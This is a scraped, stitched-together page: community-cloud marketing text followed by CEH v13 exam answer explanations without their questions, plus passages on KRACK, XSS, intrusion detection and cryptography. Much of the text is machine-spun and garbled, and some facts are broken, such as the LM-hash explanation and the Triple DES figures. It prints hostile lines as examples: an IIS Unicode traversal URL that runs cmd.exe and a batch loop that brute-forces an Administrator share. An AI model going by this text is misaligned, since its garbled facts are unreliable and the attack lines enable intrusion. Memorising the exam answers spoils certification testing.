Consists of a community of users and, as such, is scalable in several aspects like hardware resources, services, and manpower. It takes under consideration demand growth, and you simply need to increase the user-base.

High Availability and Reliability

Your cloud service must be ready to make sure the availability of knowledge and applications in the least times. Community Clouds secure your data within the same way as the other cloud service, by replicating data and applications in multiple secure locations to guard them from unforeseen circumstances.

Cloud possesses redundant infrastructure to form sure data is out there whenever and wherever you would like it. High availability and reliability are critical concerns for any sort of cloud solution.

Security and Compliance

Two significant concerns discussed when organizations believe cloud computing are data security and compliance with relevant regulatory authorities. Compromising each other’s data security isn’t profitable to anyone during a Community Cloud.

Users can configure various levels of security for his or her data. Common use cases:

the power to dam users from editing and downloading specific datasets.

Making sensitive data subject to strict regulations on who has access to Sharing sensitive data unique to a specific organization would bring harm to all or any the members involved.

What devices can store sensitive data.

Convenience and Control

Conflicts associated with convenience and control don’t arise during a Community Cloud. Democracy may be a crucial factor the Community Cloud offers as all tenants share and own the infrastructure and make decisions collaboratively. This setup allows organizations to possess their data closer to them while avoiding the complexities of a personal Cloud.

Less Work for the IT Department

Having data, applications, and systems within the cloud means you are doing not need to manage them entirely. This convenience eliminates the necessity for tenants to use extra human resources to manage the system. Even during a self-managed solution, the work is split among the participating organizations.

Environment Sustainability

In the Community Cloud, organizations use one platform for all their needs, which dissuades them from investing in separate cloud facilities. This shift introduces a symbiotic relationship between broadening and shrinking the utilization of cloud among clients. With the reduction of organizations using different clouds, resources are used more efficiently, thus resulting in a smaller carbon footprint.

document.write(); (Cookie and session ID theft)

https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/

As seen in the indicated question, cookies are escaped and sent to script to variable ‘cookie’. If the malicious user would inject this script into the website’s code, then it will be executed in the user’s browser and cookies will be sent to the malicious user.

CEH courseware categorizes hackers based on intent, authorization, and affiliation. State-sponsored hackers are defined as individuals or teams who conduct cyber operations on behalf of a government to advance national interests. These operations often include espionage, cyber warfare, intelligence gathering, and covert offensive actions. Unlike organized hackers or cybercriminal groups, whose motivations may include financial gain or ideological activism, state-sponsored units follow strategic directives issued by government agencies. CEH materials explain that such groups operate with access to advanced tools, long-term funding, and classified intelligence, enabling them to execute highly sophisticated and covert operations targeting foreign governments, corporations, or critical infrastructure. Hacktivists pursue political or social causes, while gray-hat hackers operate without explicit permission but without malicious intent. Only state-sponsored hackers match the scenario where cyber experts are formally trained, resourced, and authorized by a national government to conduct operations that remain undetected. Therefore, the correct classification is state-sponsored hackers.

A digital signature is created by hashing the document and encrypting that hash with the sender’s private key. Since the hash is specific to the original content, any change to the document invalidates the signature, making it non-transferable to another document.

Reference – CEH v13 Official Study Guide:

Module 20: Cryptography

Quote:

“Digital signatures are based on hashing the document and signing the digest with the private key. This makes each signature unique to the document and ensures tamper resistance.”

Incorrect Options:

B. Incorrect — signature is tied to one document.

C. Hashes are not plain; they are encrypted.

D. Keys can be reused, but signatures are document-specific.

This log clearly shows an HTTP GET request attempting to exploit a web server using a directory traversal attack with Unicode encoding:

The URL contains:/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

%c0%af is a known Unicode-encoded sequence used to bypass input validation filters.It translates to the forward slash character “/” when interpreted by vulnerable versions of Microsoft IIS (specifically IIS 4.0 and 5.0).

This type of attack attempts to:

Traverse out of the web root directory (via encoded ../ sequences)

Access cmd.exe in the Windows system32 directory

Execute operating system commands such as dir c: (list contents of drive C)

From CEH v13 Official Courseware:

Module 14: Hacking Web Servers

Topic: Unicode Directory Traversal Vulnerability (IIS-specific)

CEH v13 Study Guide states:

“A Unicode Directory Traversal Attack takes advantage of improper input sanitization by encoding traversal characters (../) as Unicode (e.g., %c0%af). This bypasses input filters and accesses restricted directories such as system32.”

Incorrect Options:

A. Hexcode Attack: Not a formal classification; here Unicode encoding is used.

B. Cross-Site Scripting: Involves injecting scripts into a web page, unrelated to filesystem traversal.

C. Multiple Domain Traversal: Not a valid or recognized attack type.

On Linux and UNIX-like systems, files or directories that begin with a period (.) are considered hidden. These files do not appear by default when a user runs the ls command, unless explicitly instructed to show hidden files using ls -a.

Example:

File named .hiddenfile will not appear with a simple ls command.

To view it, use: ls -a

This is commonly used for configuration files (e.g., .bashrc, .profile) and also by attackers or malicious users who want to conceal their scripts or payloads.

Incorrect Options:

A. Exclamation mark (!) is used in shell history and command expansion, not for hiding files.

B. Underscore (_) is a valid filename character but does not hide files.

C. Tilde (~) represents the current user's home directory; not used for hiding.

Reference – CEH v13 Official Courseware:

Module 06: Malware Threats

Section: “Tactics to Hide Malware Files in the OS”

Lab: CEH Engage — Creating and Hiding Files in Linux

===========

This form of testing is known as Fuzzing. Fuzzing (or fuzz testing) is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks.

In the CEH v13 courseware and study guide:

Module 6: Malware Threats

Subsection: Malware Analysis and Reverse Engineering Techniques

CEH v13 Official Study Guide and iLabs Practical

The CEH v13 guide states:

“Fuzzing is used as a software testing technique that involves sending malformed or unexpected inputs to an application in order to detect vulnerabilities such as buffer overflows, crashes, or unexpected behavior. It is particularly useful during vulnerability assessments and exploit development.”

Thus, Fuzzing helps identify vulnerabilities due to improper input validation and is widely used in vulnerability discovery and exploit testing.

Incorrect Options:

A. Randomizing: Not a recognized security testing method.

B. Bounding: Refers to setting limits or constraints; not relevant here.

C. Mutating: Can be part of fuzzing (mutation-based fuzzing), but not the umbrella term.

Rootkits can deeply infect and compromise a system’s kernel, making them very difficult to detect or remove fully. Even advanced antivirus solutions may miss them.

The most secure and recommended response is:

Completely wipe the compromised system.

Reinstall the OS from known good (clean) media.

Apply all patches and updates.

From CEH v13 Official Courseware:

Module 6: Malware Threats → Rootkit Handling

Incorrect Options:

A: Copying files might transfer infected components.

B: Trap and trace is investigative, not remedial.

C: Deleting files may not fully remove the rootkit.

D: Backups might be infected if taken post-compromise.

TCP port 48101 uses the Transmission management Protocol. transmission control protocol is one in all the most protocols in TCP/IP networks. transmission control protocol could be a connection-oriented protocol, it needs acknowledgement to line up end-to-end communications. only a association is about up user’s knowledge may be sent bi-directionally over the association.

Attention! transmission control protocol guarantees delivery of knowledge packets on port 48101 within the same order during which they were sent. bonded communication over transmission control protocol port 48101 is that the main distinction between transmission control protocol and UDP. UDP port 48101 wouldn’t have bonded communication as transmission control protocol.

UDP on port 48101 provides Associate in Nursing unreliable service and datagrams might arrive duplicated, out of order, or missing unexpectedly. UDP on port 48101 thinks that error checking and correction isn’t necessary or performed within the application, avoiding the overhead of such process at the network interface level.

UDP (User Datagram Protocol) could be a borderline message-oriented Transport Layer protocol (protocol is documented in IETF RFC 768).

Application examples that always use UDP: vocalisation IP (VoIP), streaming media and period multiplayer games. several internet applications use UDP, e.g. the name System (DNS), the Routing info Protocol (RIP), the Dynamic Host Configuration Protocol (DHCP), the straightforward Network Management Protocol (SNMP).

Regional Internet Registries (RIRs):

ARIN (American Registry for Internet Numbers)

AFRINIC (African Network Information Center)

APNIC (Asia Pacific Network Information Center)

RIPE (Réseaux IP Européens Network Coordination Centre)

LACNIC (Latin American and Caribbean Network Information Center)

A Multipartite Virus is designed to infect both the boot sector and executable files of a system. This makes it more complex and harder to remove than viruses that target only one area. It can spread in multiple ways and activate under different conditions depending on whether the infected file or boot sector is accessed first.

CEH v13 Official Curriculum states:

“Multipartite viruses infect both the boot sector and program files. They are difficult to remove and can reinfect the system unless both locations are cleaned simultaneously.”

Incorrect Options:

A. Polymorphic viruses change their code signatures but do not necessarily target both boot and executable areas.

B. Stealth viruses conceal their presence, often by intercepting system calls.

D. Macro viruses infect macro-enabled files, typically in Microsoft Office documents.

Reference – CEH v13 Guide:

Module 06: Malware Threats

Topic: Types of Malware – Multipartite Viruses

Hashing algorithms are specifically designed to ensure data integrity. A hash function takes an input and returns a fixed-length string, called a hash or message digest. Even a small change in the input results in a completely different hash, making it useful for detecting tampering.

Common hashing algorithms include:

MD5 (now obsolete for secure uses)

SHA-1, SHA-2, SHA-3

HMAC (Hashed Message Authentication Code)

From CEH v13 Courseware:

Module 20: Cryptography

Topic: Hash Functions and Data Integrity

CEH v13 Study Guide states:

“Hashing algorithms provide integrity by generating a unique digital fingerprint of data. Any alteration in the message content will result in a different hash value, indicating that the integrity has been compromised.”

Incorrect Options:

A: Symmetric algorithms provide confidentiality.

B: Asymmetric algorithms provide confidentiality and authentication.

D: "Integrity algorithms" is not a formal cryptographic term.

The command shown is a Windows batch loop that attempts to mount a hidden administrative share (c$) on a remote machine (\10.1.2.3) using the username "Administrator" and a list of passwords from the file hackfile.txt.

for /f "tokens=1 %%a in (hackfile.txt) → Reads one password per line from the file

do net use * \10.1.2.3\c$ /user:"Administrator" %%a → Tries to authenticate to the share using the Administrator account and each password

This is a classic brute-force password attack attempting to crack the Administrator account using a wordlist.

From CEH v13 Official Courseware:

Module 4: Enumeration

Module 6: Malware and Password Cracking Techniques

CEH v13 Study Guide states:

“Tools and scripts that automate login attempts using SMB shares and administrative credentials can be used to brute force user accounts. An attacker attempts access using a list of passwords (dictionary attack).”

Incorrect Options:

A: The connection attempt is made, but the success is dependent on password cracking.

B: This command does not enumerate users.

D: No null session involved; this is a brute-force attempt, not privilege escalation.

Spanning Tree Protocol (STP) manipulation attacks involve an attacker injecting BPDUs (Bridge Protocol Data Units) to force a switch to recognize the attacker’s system as the root bridge. Once this is achieved, the attacker can:

Redirect traffic through their own machine

Create a SPAN (Switched Port Analyzer) session to mirror traffic

Intercept, sniff, or modify data passing through the network

This is typically the next logical step in an STP attack to facilitate a Man-in-the-Middle (MITM) position.

Reference – CEH v13 Official Study Guide:

Module 8: Sniffing

Quote:

“An attacker who becomes the root bridge using STP manipulation can redirect traffic and use SPAN ports to mirror traffic to their system for analysis or manipulation.”

Incorrect Options:

B. OSPF is a Layer 3 routing protocol, not relevant here.

C. DoS is not the goal of this specific attack.

D. Attacking all switches is inefficient and unnecessary once root access is gained.

===========

Pharming is a cyberattack technique in which malicious code is used to redirect a website’s traffic to a fraudulent or malicious website without the user's knowledge. This redirection typically occurs through:

DNS poisoning or host file modification

Exploitation of vulnerabilities in DNS servers or user machines

Pharming aims to collect sensitive data (like usernames, passwords, credit card details) by making users believe they are interacting with a legitimate website when, in fact, they are on a fake one.

As per CEH v13 Official Courseware:

Pharming is a server-side or client-side attack that manipulates how URLs are resolved.

It differs from phishing in that it does not rely on fake emails or social engineering but rather on redirecting web traffic via compromised DNS infrastructure or local configuration.

Incorrect Options:

A. Spimming is the use of spam over instant messaging.

C. Phishing involves tricking users through fake emails or messages.

D. Spear-phishing is a targeted version of phishing directed at specific individuals or roles.

Reference – CEH v13 Official Courseware:

Module 09: Social Engineering

Section: “Phishing and Pharming Attacks”

Subsection: “Differences Between Phishing and Pharming”

Wireless Threats - Confidentiality Attacks Launch of Wireless Attacks: Evil Twin Evil Twin is a wireless AP that pretends to be a legitimate AP by replicating another network name. Attackers set up a rogue AP outside the corporate perimeter and lures users to sign into the wrong AP. (P.2297/2281)

The description in the scenario clearly points to Docker. Docker is an open-source platform that automates the deployment, scaling, and management of applications inside containers. It allows:

Isolation of applications from the underlying system

Communication through well-defined APIs and networking interfaces

Rapid packaging and shipping of applications in a containerized format

Docker uses OS-level virtualization and is ideal for Platform-as-a-Service (PaaS) environments.

Incorrect Options:

A. Virtual machines virtualize entire operating systems and are heavier in resource use.

B. Serverless computing abstracts the infrastructure entirely but is not about containerization.

D. Zero Trust is a security architecture, not a development or packaging platform.

Reference – CEH v13 Official Courseware:

Module 19: Cloud Computing

Section: “Containerization and Docker”

Subsection: “Security Benefits of Containers”

===========

CEH teaches that insufficient input validation on mobile applications enables code injection attacks. Injecting JavaScript or crafted payloads into fields validates whether the application improperly processes untrusted data. If executed, it confirms that the app is vulnerable to injection-based attacks.

Before implementing auditing, it is crucial to assess how enabling this feature will impact system resources, performance, and storage. Auditing can generate significant logs and place additional load on systems, especially in environments handling sensitive data such as banking.

Understanding the impact helps determine if the current infrastructure can handle the overhead or if optimizations or upgrades are needed beforehand.

Reference – CEH v13 Official Study Guide:

Module 5: System Hacking

Section: Enabling Auditing and Logging

Quote:

“Before enabling auditing, organizations must assess the performance and storage impact. Improper implementation can result in performance degradation or missed logs.”

Incorrect Options Explained:

A. Vulnerability scanning is important but not directly related to audit implementation.

C. Cost-benefit analysis comes after understanding operational impact.

D. Staffing is a planning step, not the first technical action.

===========

The CEH web server attack methodology describes reconnaissance as a key phase, where testers gather publicly available information before attempting exploitation. Robots.txt is commonly used by administrators to instruct web crawlers about which directories should not be indexed. CEH emphasizes that attackers regularly review robots.txt because it often exposes sensitive directories unintentionally, providing valuable intelligence about internal structure, configuration paths, administrative pages, and potential weak points. In this scenario, the tester observes “Disallow” entries and then discovers the directories are not protected by authentication, allowing direct access to sensitive files. This falls under information gathering through exposed indexing instructions rather than directory traversal, which involves path-manipulation exploits. The tester is not altering file paths or inserting traversal sequences; instead, they are reviewing publicly available indexing instructions and discovering misconfigured access controls. This perfectly aligns with the reconnaissance phase of the CEH methodology, where attackers learn about server architecture using passive or minimally intrusive techniques.

Comprehensive Explanation from CEH v13 Courseware:

CEH v13 describes worms as standalone malicious programs capable of self-replication without requiring user assistance. Unlike viruses, which need a host file and are triggered typically by user actions, worms propagate autonomously by scanning networks, exploiting vulnerabilities, or copying themselves to accessible machines. Worms are known for causing rapid, widespread damage by consuming bandwidth, degrading system performance, and creating backdoors for attackers. Classic examples such as Conficker, WannaCry, and SQL Slammer reinforce the destructive potential of automated propagation. CEH stresses that worms often use network shares, open ports, or unpatched vulnerabilities to move laterally. In contrast, keyloggers harvest keystrokes, ransomware encrypts data and demands payment, and viruses require user involvement to spread. The behavior in the scenario—automatic replication across the network—is the defining characteristic of worm activity according to CEH’s malware taxonomy.

https://en.wikipedia.org/wiki/Meet-in-the-middle_attack

The meet-in-the-middle attack (MITM), a known plaintext attack, is a generic space–time tradeoff cryptographic attack against encryption schemes that rely on performing multiple encryption operations in sequence. The MITM attack is the primary reason why Double DES is not used and why a Triple DES key (168-bit) can be bruteforced by an attacker with 256 space and 2112 operations.

The intruder has to know some parts of plaintext and their ciphertexts. Using meet-in-the-middle attacks it is possible to break ciphers, which have two or more secret keys for multiple encryption using the same algorithm. For example, the 3DES cipher works in this way. Meet-in-the-middle attack was first presented by Diffie and Hellman for cryptanalysis of DES algorithm.

https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html

Since this question refers specifically to analyzing a wireless network, it is obvious that we need an option with AirPcap (Riverbed AirPcap USB-based adapters capture 802.11 wireless traffic for analysis). Since it works with two traffic analyzers SteelCentral Packet Analyzer (Cascade Pilot) or Wireshark, the correct option would be "Wireshark with Airpcap."

NOTE: AirPcap adapters no longer available for sale effective January 1, 2018, but a question on this topic may occur on your exam.

===========

The preparation phase of incident handling is the proactive phase where organizations:

Develop and define incident response policies and rules

Assign roles and responsibilities

Design backup and disaster recovery strategies

Train staff and test response plans via drills or tabletop exercises

This phase ensures that the organization is ready to respond effectively when an incident occurs.

Reference – CEH v13 Official Study Guide:

Module 18: Incident Response and Computer Forensics

Quote:

“In the preparation phase, organizations define rules, set up an incident response team, perform training, and establish and test incident handling procedures.”

Incorrect Options:

B. Containment is about stopping the spread of an active incident

C. Identification is when the incident is first detected

D. Recovery is for restoring systems post-incident

===========

Comprehensive and Detailed Explanation:

TCPView is a Windows Sysinternals utility that provides a real-time graphical view of:

TCP and UDP endpoints on the system

Listening, established, and closing states

Associated process names using the connections

It’s ideal for administrators or analysts looking to monitor and troubleshoot live network activity.

From CEH v13 Courseware:

Module 3: Scanning Networks → Tools for Port and Service Discovery

Incorrect Options:

A. Netstat provides snapshot (static) info, not real-time with process association.

C. Nmap is used for remote scanning, not real-time local monitoring.

D. Loki is a covert channel tool used for stealthy communication.

In CEH v13 Module 02: Footprinting and Reconnaissance, Google advanced operators are tools for passive information gathering.

related: operator is used to find websites similar to a given domain or webpage.

This helps attackers discover alternate domains, competitors, or similar content that may be vulnerable or poorly secured.

Example:

related:example.com

Will return a list of sites Google deems related to example.com.

Option Clarification:

A. inurl: – Searches for a keyword in the URL.

B. related: – Correct – Finds similar or related websites.

C. info: – Provides Google’s cached and indexed data about a URL.

D. site: – Restricts search to a specific domain or site.

When using exploits, you might gain access as only a local user. This limits what you can do on the target machine. You can use Meterpreters 'getsystem` command (https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70) to elevate your permissions from a local administrator to SYSTEM. This works by using three elevation techniques.

Kernel-mode rootkits run with the best operating system privileges (Ring 0) by adding code or replacement parts of the core operating system, as well as each the kernel and associated device drivers. Most operative systems support kernel-mode device drivers, that execute with a similar privileges because the software itself. As such, several kernel-mode rootkits square measure developed as device drivers or loadable modules, like loadable kernel modules in Linux or device drivers in Microsoft Windows. This category of rootkit has unrestricted security access, however is tougher to jot down. The quality makes bugs common, and any bugs in code operative at the kernel level could seriously impact system stability, resulting in discovery of the rootkit. one amongst the primary wide familiar kernel rootkits was developed for Windows NT four.0 and discharged in Phrack magazine in 1999 by Greg Hoglund. Kernel rootkits is particularly tough to observe and take away as a result of they operate at a similar security level because the software itself, and square measure therefore able to intercept or subvert the foremost sure software operations. Any package, like antivirus package, running on the compromised system is equally vulnerable. during this scenario, no a part of the system is sure.

In this attack KRACK is an acronym for Key Reinstallation Attack. KRACK may be a severe replay attack on Wi-Fi Protected Access protocol (WPA2), which secures your Wi-Fi connection. Hackers use KRACK to take advantage of a vulnerability in WPA2. When in close range of a possible victim, attackers can access and skim encrypted data using KRACK.

How KRACK Works

Your Wi-Fi client uses a four-way handshake when attempting to attach to a protected network. The handshake confirms that both the client — your smartphone, laptop, et cetera — and therefore the access point share the right credentials, usually a password for the network. This establishes the Pairwise passkey (PMK), which allows for encoding .

Overall, this handshake procedure allows for quick logins and connections and sets up a replacement encryption key with each connection. this is often what keeps data secure on Wi-Fi connections, and every one protected Wi-Fi connections use the four-way handshake for security. This protocol is that the reason users are encouraged to use private or credential-protected Wi-Fi instead of public connections.

KRACK affects the third step of the handshake, allowing the attacker to control and replay the WPA2 encryption key to trick it into installing a key already in use. When the key’s reinstalled, other parameters related to it — the incremental transmit packet number called the nonce and therefore the replay counter — are set to their original values.

Rather than move to the fourth step within the four-way handshake, nonce resets still replay transmissions of the third step. This sets up the encryption protocol for attack, and counting on how the attackers replay the third-step transmissions, they will take down Wi-Fi security.

Why KRACK may be a Threat

Think of all the devices you employ that believe Wi-Fi. it isn’t almost laptops and smartphones; numerous smart devices now structure the web of Things (IoT). due to the vulnerability in WPA2, everything connected to Wi-Fi is in danger of being hacked or hijacked.

Attackers using KRACK can gain access to usernames and passwords also as data stored on devices. Hackers can read emails and consider photos of transmitted data then use that information to blackmail users or sell it on the Dark Web.

Theft of stored data requires more steps, like an HTTP content injection to load malware into the system. Hackers could conceivably take hold of any device used thereon Wi-Fi connection. Because the attacks require hackers to be on the brink of the target, these internet security threats could also cause physical security threats.

On the opposite hand, the necessity to be in close proximity is that the only excellent news associated with KRACK, as meaning a widespread attack would be extremely difficult.

Victims are specifically targeted. However, there are concerns that a experienced attacker could develop the talents to use HTTP content injection to load malware onto websites to make a more widespread affect.

Everyone is in danger from KRACK vulnerability. Patches are available for Windows and iOS devices, but a released patch for Android devices is currently in question (November 2017). There are issues with the discharge , and lots of question if all versions and devices are covered.

The real problem is with routers and IoT devices. These devices aren’t updated as regularly as computer operating systems, and for several devices, security flaws got to be addressed on the manufacturing side. New devices should address KRACK, but the devices you have already got in your home probably aren’t protected.

The best protection against KRACK is to make sure any device connected to Wi-Fi is patched and updated with the newest firmware. that has checking together with your router’s manufacturer periodically to ascertain if patches are available.

The safest connection option may be a private VPN, especially when publicly spaces. If you would like a VPN for private use, avoid free options, as they need their own security problems and there’ll even be issues with HTTPs. Use a paid service offered by a trusted vendor like Kaspersky. Also, more modern networks use WPA3 for better security.

Avoid using public Wi-Fi, albeit it’s password protection. That password is out there to almost anyone, which reduces the safety level considerably.

All the widespread implications of KRACK and therefore the WPA2 vulnerability aren’t yet clear. what’s certain is that everybody who uses Wi-Fi is in danger and wishes to require precautions to guard their data and devices.

There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS flaws: non-persistent and persistent. In this issue, we consider the non-persistent cross-site scripting vulnerability.

The non-persistent (or reflected) cross-site scripting vulnerability is by far the most basic type of web vulnerability. These holes show up when the data provided by a web client, most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content.

Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection. A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue.

Wireless network assessment determines the vulnerabilities in an organization’s wireless networks. In the past, wireless networks used weak and defective data encryption mechanisms. Now, wireless network standards have evolved, but many networks still use weak and outdated security mechanisms and are open to attack. Wireless network assessments try to attack wireless authentication mechanisms and gain unauthorized access. This type of assessment tests wireless networks and identifies rogue networks that may exist within an organization’s perimeter. These assessments audit client-specified sites with a wireless network. They sniff wireless network traffic and try to crack encryption keys. Auditors test other network access if they gain access to the wireless network.

Expanding your network capabilities are often done well using wireless networks, but it also can be a source of harm to your data system . Deficiencies in its implementations or configurations can allow tip to be accessed in an unauthorized manner.This makes it imperative to closely monitor your wireless network while also conducting periodic Wireless Network assessment.

It identifies flaws and provides an unadulterated view of exactly how vulnerable your systems are to malicious and unauthorized accesses.

Identifying misconfigurations and inconsistencies in wireless implementations and rogue access points can improve your security posture and achieve compliance with regulatory frameworks.

The Blackjacking attack involves leveraging a compromised BlackBerry device and its connection through the BlackBerry Enterprise Server (BES) to tunnel back into the internal corporate network, bypassing perimeter firewalls. The tool used in this method is BBProxy.

BBProxy is installed on the BlackBerry device and establishes a covert tunnel via BES, allowing attackers to pivot into the internal LAN from outside the perimeter.

Reference – CEH v13 Official Study Guide:

Module 17: Hacking Mobile Platforms

Quote:

“Blackjacking is a technique in which attackers use BBProxy to exploit a trusted path from a BlackBerry device to the corporate LAN through BES.”

Incorrect Options Explained:

A. Paros Proxy is a web proxy used for intercepting HTTP/S traffic.

C. Blooover is used for Bluetooth security auditing.

D. BBCrack is used for password recovery on BlackBerry devices, not for tunneling.

===========

Comprehensive and Detailed Explanation:

The AAAA (Quad A) record is the DNS record type used to map a domain name to an IPv6 address. It is the IPv6 equivalent of an A (Address) record, which maps to an IPv4 address.

From CEH v13 Courseware:

Module 4: Enumeration → DNS Record Types

In CEH v13 Module 13: Hacking Web Applications, this exact payload is an example of an XXE (XML External Entity) Attack.

XXE Attack:

Exploits the way XML parsers process DOCTYPE declarations.

The payload references a local file (/etc/passwd), allowing local file inclusion.

Can result in sensitive file disclosure, SSRF, or Denial of Service (DoS).

Option Clarification:

A. XXE: Correct – targets vulnerable XML parsers.

B. SQLi: Targets SQL databases with ' OR '1'='1-type injections.

C. IDOR: Insecure Direct Object Reference, not related to XML.

D. XSS: Cross-site scripting; this is XML-based, not JavaScript injection.

Passive reconnaissance focuses on collecting intelligence without interacting with the target's systems. CEH materials emphasize reviewing publicly available information, including leaked documents, breach data, reports, or exposed metadata, as this yields internal network structure details while generating no detectable traffic. This method avoids triggering monitoring systems and aligns with stealth requirements for covert intelligence gathering.

The VRFY commands enables SMTP clients to send an invitation to an SMTP server to verify that mail for a selected user name resides on the server. The VRFY command is defined in RFC 821.

The server sends a response indicating whether the user is local or not, whether mail are going to be forwarded, and so on. A response of 250 indicates that the user name is local; a response of 251 indicates that the user name isn’t local, but the server can forward the message. The server response includes the mailbox name.

The described scenario is a textbook example of a Man-in-the-Middle (MITM) attack. In such attacks, the attacker stealthily places themselves between two communicating systems, intercepts their communications, and may even modify the traffic. The communicating parties remain unaware that their traffic is being monitored or altered.

Eric is using the Dsniff toolset, which is well-known for enabling MITM attacks through techniques such as:

ARP spoofing (to redirect traffic)

Credential sniffing

Packet manipulation

From CEH v13 Official Courseware:

Module 8: Sniffing

Module 11: Session Hijacking

CEH v13 Study Guide states:

“In a man-in-the-middle (MITM) attack, the attacker intercepts and potentially alters the communication between two systems without either party knowing. Tools like Dsniff, Cain & Abel, and Ettercap are commonly used to launch such attacks.”

Incorrect Options:

A: “Interceptor” is not a technical term in cybersecurity.

C: ARP Proxy is a network feature; while ARP spoofing can be part of a MITM attack, it’s not the attack classification itself.

D: Poisoning (like DNS or ARP poisoning) is often a technique used to initiate MITM but not the final classification.

In CEH v13 Module 12: Hacking Web Applications, SOAP (Simple Object Access Protocol) is discussed as a protocol that allows web service communication using XML-based messages.

Correct SOAP Characteristics:

Structured model for data exchange, used in SOAP envelopes.

Built on XML format.

Can operate over multiple application layer protocols, not just HTTP (e.g., SMTP, FTP, JMS).

Option B is incorrect because:

While SOAP most commonly uses HTTP, it is not limited to it. SOAP is protocol-independent at the transport layer.

An anomaly-based intrusion detection system is an intrusion detection system for detecting both network and computer intrusions and misuse by monitoring system activity and classifying it as either normal or anomalous. The classification is based on heuristics or rules, rather than patterns or signatures, and attempts to detect any type of misuse that falls out of normal system operation. This is as opposed to signature-based systems, which can only detect attacks for which a signature has previously been created.

In order to positively identify attack traffic, the system must be taught to recognize normal system activity. The two phases of a majority of anomaly detection systems consist of the training phase (where a profile of normal behaviors is built) and the testing phase (where current traffic is compared with the profile created in the training phase). Anomalies are detected in several ways, most often with artificial intelligence type techniques. Systems using artificial neural networks have been used to great effect. Another method is to define what normal usage of the system comprises using a strict mathematical model, and flag any deviation from this as an attack. This is known as strict anomaly detection.[3] Other techniques used to detect anomalies include data mining methods, grammar-based methods, and the Artificial Immune System.

Network-based anomalous intrusion detection systems often provide a second line of defense to detect anomalous traffic at the physical and network layers after it has passed through a firewall or other security appliance on the border of a network. Host-based anomalous intrusion detection systems are one of the last layers of defense and reside on computer endpoints. They allow for fine-tuned, granular protection of endpoints at the application level.

Anomaly-based Intrusion Detection at both the network and host levels have a few shortcomings; namely a high false-positive rate and the ability to be fooled by a correctly delivered attack. Attempts have been made to address these issues through techniques used by PAYL and MCPAD.

Objectives of Footprinting Draw Network Map - Combining footprinting techniques with tools such as Tracert allows the attacker to create diagrammatic representations of the target organization’s network presence. Specficially, it allows attackers to draw a map or outline of the target organization’s network infrastructure to know about the actual environment that they are going to break into. These network diagrams can guide the attacker in performing an attack. (P.114/98)

Social engineering attacks that target business processes are especially effective when they mimic legitimate workflows. CEH learning materials emphasize that attackers often exploit trust relationships and organizational procedures rather than attempting broad or generic phishing methods. In the context of HR operations, onboarding portals are highly trusted and frequently accessed by new employees who expect to enter personal information, submit documents, and receive initial network credentials. By creating a fake onboarding portal that closely resembles the organization’s internal system, an attacker can collect credentials without triggering suspicion because the action being requested appears normal and expected. This method leverages procedural familiarity, brand consistency, and the implied authority of HR communications, making it far more effective than generic phishing emails or unsolicited social media messages. Phone calls, while sometimes useful, involve real-time interaction and increase the chance of detection. The fake portal, however, seamlessly integrates into existing processes, making it the most effective and lowest-profile approach for acquiring network credentials.

Challenge/response authentication is designed to prevent replay attacks. In this mechanism:

The server sends a random “challenge” string.

The client uses its secret (like a password or private key) to generate a response.

The server verifies that the response matches what it expected for that challenge.

Since the challenge is random and changes each time, an attacker cannot simply capture and replay previous responses to gain unauthorized access.

From CEH v13 Courseware:

Module 11: Session Hijacking

Module 6: Authentication Protocols

CEH v13 Study Guide states:

“Challenge-response authentication prevents replay attacks by using dynamically generated nonces or challenge tokens that change with each session.”

Incorrect Options:

B: Scanning attacks are not related to authentication mechanisms.

C: Session hijacking involves active takeovers, not replaying login attempts.

D: Password cracking targets password hashes, not session tokens.

Public-key cryptography, or asymmetric cryptography, is a cryptographic system that uses pairs of keys: public keys (which may be known to others), and private keys (which may never be known by any except the owner). The generation of such key pairs depends on cryptographic algorithms which are based on mathematical problems termed one-way functions. Effective security requires keeping the private key private; the public key can be openly distributed without compromising security.

In such a system, any person can encrypt a message using the intended receiver's public key, but that encrypted message can only be decrypted with the receiver's private key. This allows, for instance, a server program to generate a cryptographic key intended for a suitable symmetric-key cryptography, then to use a client's openly-shared public key to encrypt that newly generated symmetric key. The server can then send this encrypted symmetric key over an insecure channel to the client; only the client can decrypt it using the client's private key (which pairs with the public key used by the server to encrypt the message). With the client and server both having the same symmetric key, they can safely use symmetric key encryption (likely much faster) to communicate over otherwise-insecure channels. This scheme has the advantage of not having to manually pre-share symmetric keys (a fundamentally difficult problem) while gaining the higher data throughput advantage of symmetric-key cryptography.

With public-key cryptography, robust authentication is also possible. A sender can combine a message with a private key to create a short digital signature on the message. Anyone with the sender's corresponding public key can combine that message with a claimed digital signature; if the signature matches the message, the origin of the message is verified (i.e., it must have been made by the owner of the corresponding private key).

Public key algorithms are fundamental security primitives in modern cryptosystems, including applications and protocols which offer assurance of the confidentiality, authenticity and non-repudiability of electronic communications and data storage. They underpin numerous Internet standards, such as Transport Layer Security (TLS), S/MIME, PGP, and GPG. Some public key algorithms provide key distribution and secrecy (e.g., Diffie–Hellman key exchange), some provide digital signatures (e.g., Digital Signature Algorithm), and some provide both (e.g., RSA). Compared to symmetric encryption, asymmetric encryption is rather slower than good symmetric encryption, too slow for many purposes. Today's cryptosystems (such as TLS, Secure Shell) use both symmetric encryption and asymmetric encryption.

LM hashes are split into two 16-character halves (each representing 7-character blocks). If the original password is less than 8 characters, the second half of the LM hash will always be a constant:

"AAD3B435B51404EE"

This known value is used to pad the second half of the password, and it signals that the original password was 7 characters or fewer.

In the options:

B. 44EFCE164AB921CQAAD3B435B51404EE ← ends with AAD3B435B51404EE → < 8 chars

